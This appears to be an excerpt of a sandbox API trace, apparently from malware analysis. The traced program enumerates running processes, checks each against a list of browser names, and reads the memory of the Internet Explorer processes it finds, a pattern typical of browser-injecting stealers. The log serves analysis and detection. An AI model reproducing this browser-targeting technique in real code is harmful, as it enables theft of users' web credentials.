	[0245.157] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.157] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0245.158] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x91c0
	[0245.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.158] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0245.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.159] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.159] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0245.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.160] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.160] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0245.161] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x91c4
	[0245.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.161] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0245.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.162] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.162] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0245.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.162] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.162] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0245.163] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x91c8
	[0245.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.163] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0245.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.164] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.164] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0245.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.164] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.165] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0245.166] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x91cc
	[0245.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.166] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0245.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.166] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.167] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0245.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.167] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.168] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0245.168] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x91d0
	[0245.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.169] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0245.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.169] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.169] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0245.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.169] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.170] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0245.181] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x91d4
	[0245.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.181] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0245.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.182] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.182] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0245.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.182] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.182] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0245.183] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x91d8
	[0245.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.183] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0245.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.184] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.184] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0245.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.185] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.185] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0245.187] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x91dc
	[0245.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.187] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0245.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.188] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.188] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0245.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.189] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.190] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0245.190] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x91e0
	[0245.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.191] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0245.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.191] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.192] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0245.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.192] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.193] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0245.193] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x91e4
	[0245.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.193] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0245.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.194] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.195] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0245.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.195] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.196] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0245.197] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x91e8
	[0245.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.197] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0245.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.197] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.198] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0245.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.198] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.198] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0245.199] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x91ec
	[0245.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.199] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0245.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.200] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0245.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.200] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0245.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.200] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.200] NtQueryInformationProcess (in: ProcessHandle=0x91ec, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0245.201] ReadProcessMemory (in: hProcess=0x91ec, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0245.201] ReadProcessMemory (in: hProcess=0x91ec, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0245.201] ReadProcessMemory (in: hProcess=0x91ec, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0245.201] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0245.201] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0245.202] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x91f0
	[0245.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.202] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0245.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.203] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0245.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.203] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0245.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.203] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.204] NtQueryInformationProcess (in: ProcessHandle=0x91f0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0245.204] ReadProcessMemory (in: hProcess=0x91f0, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0245.204] ReadProcessMemory (in: hProcess=0x91f0, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0245.204] ReadProcessMemory (in: hProcess=0x91f0, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0245.204] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0245.204] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0245.205] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x91f4
	[0245.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.205] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0245.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.205] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.206] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0245.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.206] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.206] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0245.207] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x91f8
	[0245.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.207] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0245.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.207] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.208] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0245.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.208] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.208] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.209] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x91fc
	[0245.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.209] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.210] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.210] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.210] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.210] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.211] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.212] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x9200
	[0245.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.212] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.212] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.213] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.213] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.213] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.214] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x9204
	[0245.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.214] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.215] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.215] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.215] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.215] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0245.216] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x9208
	[0245.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.216] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0245.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.217] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.219] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0245.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.219] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.219] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.220] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x920c
	[0245.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.220] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.221] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.221] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.221] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.222] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.222] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x9210
	[0245.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.222] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.223] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.223] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.223] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.224] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0245.224] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x9214
	[0245.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.225] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0245.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.225] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.225] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0245.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.225] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.226] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
